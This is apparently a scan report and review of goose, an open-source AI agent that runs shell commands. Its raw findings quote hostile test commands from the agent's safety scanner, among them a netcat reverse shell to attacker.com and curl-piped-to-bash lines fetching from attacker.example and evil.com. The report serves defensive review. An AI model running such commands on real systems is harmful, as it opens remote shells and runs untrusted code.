7 min read

goose: An Open-Source AI Agent for Desktop and Terminal (GitHub, Scanned)

A general-purpose AI agent for desktop and terminal that runs commands, edits files and uses MCP tools.

goose logo
✅
Scan: safe. Nothing malicious. Two things to know: goose runs shell commands with your permissions by design, and the CLI installer is a curl | bash script that can append a PATH line to your shell profile. Scanned Oct 2, 2026; the full report is below.

goose is an AI agent that runs on your machine and does the work rather than suggesting it. Ask for something and it plans the steps, runs shell commands, reads and edits files, installs dependencies and runs tests, checking the results as it goes. It is not limited to code: the same agent handles research, writing, data analysis and automation, and recipes let you save a workflow and run it again.

It comes as a desktop app for macOS, Windows and Linux, a CLI, and an API for embedding it elsewhere. It works with more than 15 providers, including Anthropic, OpenAI, Google, OpenRouter, Azure, Bedrock and local models through Ollama, and can use an existing Claude, ChatGPT or Gemini subscription through ACP. Its abilities come from extensions built on the Model Context Protocol, more than 70 of them.

goose was created at Block, the company behind Square and Cash App, is written in Rust, and is now part of the Agentic AI Foundation at the Linux Foundation. It is Apache-2.0 licensed, has about 55,000 stars, and releases often: version 1.53 shipped on October 2, 2026.

  • Repository: github.com/aaif-goose/goose
  • Licence: Apache-2.0 (Apache License 2.0)
  • Language: Rust. Stars: 54.9K. Forks: 6,352. Last push: Oct 2, 2026.
  • Scan: safe, Oct 2, 2026, commit 591edd4

Who it is for

Developers who want an autonomous agent that is not tied to one model vendor or editor, and non-developers who want an assistant that can operate their computer through a desktop app, with the model of their choice.

Getting started

1. Desktop app on macOS with Homebrew (Windows and Linux downloads are on goose-docs.ai)

brew install --cask block-goose

2. Or install the CLI on macOS or Linux (brew install block-goose-cli also works)

curl -fsSL https://github.com/aaif-goose/goose/releases/download/stable/download_cli.sh | bash

3. Choose a model provider and enter its key

goose configure

4. Start a session

goose session

The CLI installer is a shell script from the project's GitHub releases, run as is, and it offers to add ~/.local/bin to your shell profile; Homebrew is the alternative. goose runs commands with your user's permissions, so check its permission mode before handing it a broad task. The official quickstart suggests Tetrate's Agent Router as a provider, with $10 of starting credit; any other provider key works instead.

Safety scan

We cloned aaif-goose/goose at commit 591edd4 on Oct 2, 2026 and ran the checks described on the GitHub Tools page: credential patterns, decode-and-execute code, install-time scripts, committed binaries, risky CI workflows, every host the code talks to, known vulnerabilities in pinned dependencies, and project hygiene. A person read every hit. This is what we found.

  • No committed binaries across 2,494 files and about 620,000 lines, half of it Rust. The 13 secret hits are not keys: comments and tests in crates/goose-providers/src/api_client.rs and gcpauth.rs that name PEM formats while converting client certificates, and a ghp_xxxx placeholder in the GitHub MCP docs. The bare-IP URL is a test redirect to the 192.0.2.1 documentation address.
  • Most pattern hits come from goose's own command-safety scanner, crates/goose/src/security, whose tests contain dangerous commands such as nc -e /bin/bash on purpose. The rest are install hints for Amp and jbang, documentation Dockerfiles installing Node, uv and jbang, and the installer's own usage comment.
  • download_cli.sh fetches the release archive from GitHub, installs to ~/.local/bin, and offers to add that folder to your shell profile; it does not use sudo. Usage data is opt-in: goose asks on first use and sends only counts, versions, provider and model names, never conversations or code.
  • ui/pnpm-lock.yaml, the desktop app, pins 1,412 packages with 120 advisories (1 critical, 59 high). The critical is a tar denial-of-service in build tooling; the highs include Electron 43.4.0 sandbox and protocol-handler issues, which do ship in the app, plus xmldom and minimatch. Cargo.lock (1,319 crates) has 10, two of them high in rmcp, the MCP SDK. The documentation site accounts for another 30.
  • 43 workflows. The three flagged for pull_request_target do not run PR code: in code-review.yml the trigger is commented out and it runs only on manual dispatch from the base branch, and the other two handle Dependabot auto-merge and test quarantine. All 78 third-party actions are pinned to commits. Security policy, Dependabot, CodeQL, licence, contributing guide and code of conduct present; OpenSSF Scorecard 5.9.

What the scanner counted

CheckResult
Secrets13 candidates found and read; see the notes above.
Suspicious code20 pattern hits found and read; every one is listed under the raw findings.
Install-time code3 npm lifecycle scripts. 1 setup.py with custom install logic. 1 Cargo build script. 5 installer scripts (one can call sudo)
Committed binariesNone.
CI workflows43 workflows. 3 use pull_request_target, none check out the pull request head. 0 of 78 third-party actions pinned to a tag rather than a commit.
Network hosts40 distinct hosts referenced from source; most often github.com, example.invalid, api.openai.com, errors.pydantic.dev. 1 URL to a bare IP address, listed under the raw findings.
Known vulnerabilities152 advisories across 3,603 pinned packages: 1 critical, 72 high, 59 moderate, 16 low, 4 unrated. Cargo.lock: 1,319 packages, 10 advisories; documentation/package-lock.json: 1,384 packages, 30 advisories; scripts/provider-error-proxy/uv.lock: 12 packages, 0 advisories; ui/pnpm-lock.yaml: 1,412 packages, 120 advisories.
Project hygieneHas security policy, automated dependency updates, CodeQL, licence file, contributing guide.
OpenSSF Scorecard5.9 out of 10, as of Oct 2, 2026.

The raw findings

Every hit the scanner wrote out, with a link to the exact line at the scanned commit. Secrets candidates are redacted.

Secret candidates (13, redacted)
WhereRuleMatch
crates/goose-providers/src/api_client.rs:145private-key-----B…--- (27 chars)
crates/goose-providers/src/api_client.rs:147private-key-----B…--- (31 chars)
crates/goose-providers/src/api_client.rs:150private-key-----B…--- (30 chars)
crates/goose-providers/src/api_client.rs:152private-key-----B…--- (27 chars)
crates/goose-providers/src/api_client.rs:643private-key-----B…--- (27 chars)
crates/goose-providers/src/api_client.rs:673private-key-----B…--- (31 chars)
crates/goose-providers/src/api_client.rs:702private-key-----B…--- (30 chars)
crates/goose-providers/src/api_client.rs:717private-key-----B…--- (27 chars)
crates/goose-providers/src/api_client.rs:730private-key-----B…--- (27 chars)
crates/goose-providers/src/api_client.rs:743private-key-----B…--- (31 chars)
crates/goose/src/providers/gcpauth.rs:644private-key-----B…--- (31 chars)
crates/goose/src/providers/gcpauth.rs:915private-key-----B…--- (27 chars)
documentation/docs/mcp/github-mcp.md:64github-tokenghp_xx…xxx (40 chars)
Pattern hits (20)
WhereRuleMatch
crates/goose-cli/src/commands/configure.rs:149download-piped-to-shellIf you installed via 'curl ... | bash', run 'goose configure' separately after installation."
crates/goose/src/providers/amp_acp.rs:34download-piped-to-shell"Install the Amp CLI: `curl -fsSL https://ampcode.com/install.sh | bash`",
crates/goose/src/security/patterns.rs:426download-piped-to-shellassert!(matches(pat, "curl https://example.com/install | bash.exe"));
crates/goose/src/security/patterns.rs:429download-piped-to-shell"curl https://example.com/install | bash>/tmp/install.log"
crates/goose/src/security/patterns.rs:433download-piped-to-shell"wget -qO- https://example.com/install | sh</tmp/script"
crates/goose/src/security/patterns.rs:437download-piped-to-shell"wget -qO- https://example.com/install | sh.exe"
crates/goose/src/security/patterns.rs:462download-piped-to-shell"curl https://example.com/install | bash.exe-helper"
crates/goose/src/security/scanner.rs:662raw-socket-shell"command": "nc -e /bin/bash attacker.com 4444"
crates/goose/src/security/scanner.rs:682download-piped-to-shell"command": "curl https://attacker.example | bash"
crates/goose/src/security/security_inspector.rs:118download-piped-to-shell.with_arguments(object!({"command": "curl https://evil.com/script.sh | bash"}))),
documentation/docs/docker/Dockerfile:7download-piped-to-shellRUN curl -fsSL https://deb.nodesource.com/setup_lts.x | bash - && \
documentation/docs/docker/Dockerfile:48download-piped-to-shellRUN curl -fsSL https://deb.nodesource.com/setup_lts.x | bash - && \
documentation/docs/docker/Dockerfile:87download-piped-to-shellRUN curl -LsSf https://astral.sh/uv/install.sh | sh
documentation/docs/docker/Dockerfile:90download-piped-to-shellRUN curl -Ls https://sh.jbang.dev | bash -s - app setup
documentation/src/pages/index.tsx:324download-piped-to-shell{`curl -fsSL https://github.com/aaif-goose/goose/releases/download/stable/download_cli.sh | bash`}
download_cli.sh:14download-piped-to-shell# curl -fsSL https://github.com/aaif-goose/goose/releases/download/stable/download_cli.sh | bash
download_cli.sh:364download-piped-to-shellecho "Non-interactive shell detected (e.g. 'curl ... | bash')."
ui/desktop/src/bin/jbang:153download-piped-to-shellcurl -Ls https://sh.jbang.dev | bash -s - app setup
ui/goose-acp-client/src/generated/index.ts:3very-long-line9149 chars
ui/goose-acp-client/src/generated/types.gen.ts:2774very-long-line4026 chars
URLs to bare IP addresses (1)
WhereRuleMatch
crates/goose-providers/src/api_client.rs:864ip-literal-url"HTTP/1.1 {status}\r\nLocation: http://192.0.2.1/capture\r\nContent-Length: 0\r\n\r\n"
npm lifecycle scripts (3)
  • ui/desktop/package.json postinstall: pnpm run build-goose-acp-client
  • ui/goose-acp-client/package.json prepack: npm run build
  • ui/goose-acp/package.json prepack: npm run build
Installer scripts (5)
Worst known vulnerabilities (24 of 152)
AdvisorySeverityPackageSummary
GHSA-23hp-3jrh-7fpwcriticaltar@6.2.1node-tar: Decompression/parse DoS via unlimited input
GHSA-33f5-2c5q-wgwjhighrmcp@1.8.0RMCP: Missing Resource Field Validation in OAuth Protected Resource Metadata Discovery
GHSA-9pj6-vhgr-3mwhhighrmcp@1.8.0RMCP: Unauthenticated permanent session-table leak in rmcp Streamable HTTP server transport leads to remote denial-of-se…
GHSA-6j4f-fj2g-mc7phighbrace-expansion@1.1.18brace-expansion: DoS via uncontrolled recursion in parseCommaParts causing stack exhaustion
GHSA-qhr7-859c-m2p7highbrace-expansion@1.1.18brace-expansion: DoS via uncontrolled recursion on nested brace groups causing stack exhaustion
GHSA-vfj7-8cjw-p6xmhighbraces@3.0.3braces vulnerable to stack-exhaustion denial of service through deeply nested patterns
GHSA-6j4f-fj2g-mc7phighbrace-expansion@2.1.4brace-expansion: DoS via uncontrolled recursion in parseCommaParts causing stack exhaustion
GHSA-qhr7-859c-m2p7highbrace-expansion@2.1.4brace-expansion: DoS via uncontrolled recursion on nested brace groups causing stack exhaustion
GHSA-23c5-xmqv-rm74highminimatch@9.0.5minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions
GHSA-3ppc-4f35-3m26highminimatch@9.0.5minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern
GHSA-7r86-cg39-jmmjhighminimatch@9.0.5minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments
GHSA-ch52-4w7c-c8xphighhttp-cache-semantics@4.2.0http-cache-semantics max-stale handling can disclose cross-user cached responses
GHSA-5p2g-fcmc-qvqqhighimage-size@2.0.2image-size: JXL and HEIF parsers allow denial of service through infinite loops
GHSA-w3rx-r6r6-pgprhighimage-size@2.0.2image-size: ICNS parser allows denial of service through an infinite loop
GHSA-23c5-xmqv-rm74highminimatch@3.1.2minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions
GHSA-3ppc-4f35-3m26highminimatch@3.1.2minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern
GHSA-7r86-cg39-jmmjhighminimatch@3.1.2minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments
GHSA-2v37-7h3g-55p8highnanoid@3.3.16nanoid: custom generators can loop indefinitely when size is zero
GHSA-5c6j-r48x-rmvqhighserialize-javascript@6.0.2Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()
GHSA-g84c-rxfj-3j2chighwebpack-dev-middleware@7.4.5webpack-dev-middleware vulnerable to Path Traversal via non-slash-terminated publicPath
GHSA-27p8-2357-5qqvhigh@xmldom/xmldom@0.9.11xmldom: DocType `name` Injection Bypasses requireWellFormed
GHSA-3px3-54cx-rmw9high@xmldom/xmldom@0.9.11xmldom: Creation-time XML Name/QName validation is bypassable via an embedded line terminator, allowing injection on the…
GHSA-6mj3-qw4j-hgrwhigh@xmldom/xmldom@0.9.11xmldom: HTML raw-text closing-tag case mismatch causes output amplification
GHSA-8344-3jmq-59r6high@xmldom/xmldom@0.9.11xmldom: Quadratic-time attribute deduplication
Workflows worth a look

By the numbers

Stars54.9K
Forks6,352
Contributors655
Commits5,771
Open issues274
Open pull requests148
Releases154
Latest releasev1.53.0
LicenceApache-2.0
Main languageRust
Project age2 years
Last pushOct 2, 2026
Tracked files2,494
Lines of code620.5K
Checkout size361 MB

Lines by language: Rust 302.8K, TypeScript 109.8K, JSON 104.1K, Markdown 60.6K, YAML 16.7K, Python 6,699.

Questions

Is goose free?

Yes. goose is Apache-2.0 licensed and free on every platform, with no account. The model is the cost: hosted providers bill your API key, an existing Claude, ChatGPT or Gemini subscription can be used through ACP, and local models through Ollama cost nothing beyond the hardware.

Is goose safe to let loose on my computer?

It acts with your user's permissions, so treat it like any agent that runs shell commands. goose has permission modes ranging from fully autonomous to asking before each tool call, and running it inside a project folder or a container limits what a mistake can touch.

How is goose different from Claude Code or Codex?

Those are built around their vendors' models and focused on coding. goose works with any provider, including local models, ships a desktop app as well as a CLI, and is meant for general tasks as well as code. It is also governed by a foundation rather than a single company.


This post is part of GitHub Tools, where every repository is cloned and scanned before it is written up. The scan is a snapshot of one commit on one day; the repository has moved on since, so check it before you install.